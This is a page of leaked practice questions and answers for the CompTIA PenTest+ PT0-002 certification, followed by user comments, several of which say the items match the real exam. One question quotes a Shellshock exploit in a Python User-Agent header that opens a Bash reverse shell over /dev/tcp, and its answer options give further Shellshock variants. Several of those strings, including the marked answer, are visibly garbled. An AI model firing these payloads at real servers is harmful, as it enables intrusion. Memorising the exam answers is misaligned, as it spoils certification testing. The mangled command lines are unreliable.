CompTIA
Checkpoint
ISC
HP
Dell
EC-Council
EXIN
Fortinet
ITIL®
Juniper
PMI
Microsoft
VMware
Avaya
Google
Salesforce
Amazon
Palo Alto Networks
Certiport
ISC2
All Vendors
  2. Home
  3. Exams
  4. CompTIA
  5. PT0-002

Free PT0-002 Exam Braindumps (page: 13)

Page 13 of 93
PDF with 366 Questions

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: <name- serial_number>.
Which of the following would be the best action for the tester to take NEXT with this information?

  1. Create a custom password dictionary as preparation for password spray testing.
  2. Recommend using a password manager/vault instead of text files to store passwords securely.
  3. Recommend configuring password complexity rules in all the systems and applications.
  4. Document the unprotected file repository as a finding in the penetration-testing report.

Answer(s): D



When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified.
Which of the following character combinations should be used on the first line of the script to accomplish this goal?

  1. <#
  2. <$
  3. ##
  4. #$
  5. #!

Answer(s): E


Reference:

https://linuxconfig.org/bash-scripting-tutorial-for-beginners



A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.
Which of the following techniques would BEST accomplish this goal?

  1. RFID cloning
  2. RFID tagging
  3. Meta tagging
  4. Tag nesting

Answer(s): D



A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploit = {`User-Agent`: `() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1`, `Accept`: `text/html,application/ xhtml+xml,application/xml`}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}

  1. A . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”:
    “text/html,application/xhtml+xml,application/xml”}
  2. exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& find / -perm -4000”, “Accept”:
    “text/html,application/xhtml+xml,application/xml”}
  3. exploits = {“User-Agent”: “() { ignored;};/bin/sh Ci ps Cef” 0>&1”, “Accept”:
    “text/html,application/xhtml+xml,application/xml”}
  4. exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/10.10.1.1/80” 0>&1”,
    “Accept”: “text/html,application/xhtml+xml,application/xml”}

Answer(s): A



Page 13 of 93



Post your Comments and Discuss CompTIA PT0-002 exam with other Community members:

Evan Couture commented on December 03, 2024
These questions are exactly what you will see on exam day, but they are good study. The exam may have questions covering similar objectives, but you will still need to study the material and perform hands on labs to be fully prepared. I used certmaster learn, infosec labs, pentest+ for dummies, pluralsight, wordwall user(markutree has some useful matching exercises), quizlet, and of course this resource. Hope this helps.
Anonymous
upvote

Nate commented on October 04, 2024
I worked really hard to pass this exam. It is a very hard exam. These questions are you best buddy. So use them.
UNITED STATES
upvote

Anon commented on August 01, 2024
Good content and useful practice questions. However I run some of the content against ChatGPT and the accuracy was around 90%. I know ChatGPT is not always correct but 90% match is pretty good to me.
UNITED STATES
upvote

Briyan commented on June 18, 2024
Good for passing the exam with a high mark but not ideal for deep learning. This helped me pass the exam and I got the high mark but I learned very little as they are all questions from the real exam.
UNITED STATES
upvote

anon commented on June 05, 2024
Question 20 regarding SSHD nmap scan doesnt add up. why would you do -sA ack scan?? why not a script or something?
UNITED STATES
upvote

SAJI commented on July 20, 2023
56 question correct answer a,b
Anonymous
upvote

Summer commented on October 04, 2023
looking forward to the real exam
Anonymous
upvote

Summer commented on October 04, 2023
looking forward to the real exam
Anonymous
upvote

Wale commented on August 19, 2023
I am new here , just started going through the questions
EUROPEAN UNION
upvote

Doddy commented on July 31, 2023
I have passed PT0-002, thanks!
Anonymous
upvote

SAJI commented on July 20, 2023
56 question correct answer A,B
Anonymous
upvote

Danny commented on August 12, 2021
Well worth... cheap and very helpful.
UNITED STATES
upvote

Frank commented on July 22, 2021
Focus on these questions and your are going to pass. That is what I did. Good luck guys.
SOUTH AFRICA
upvote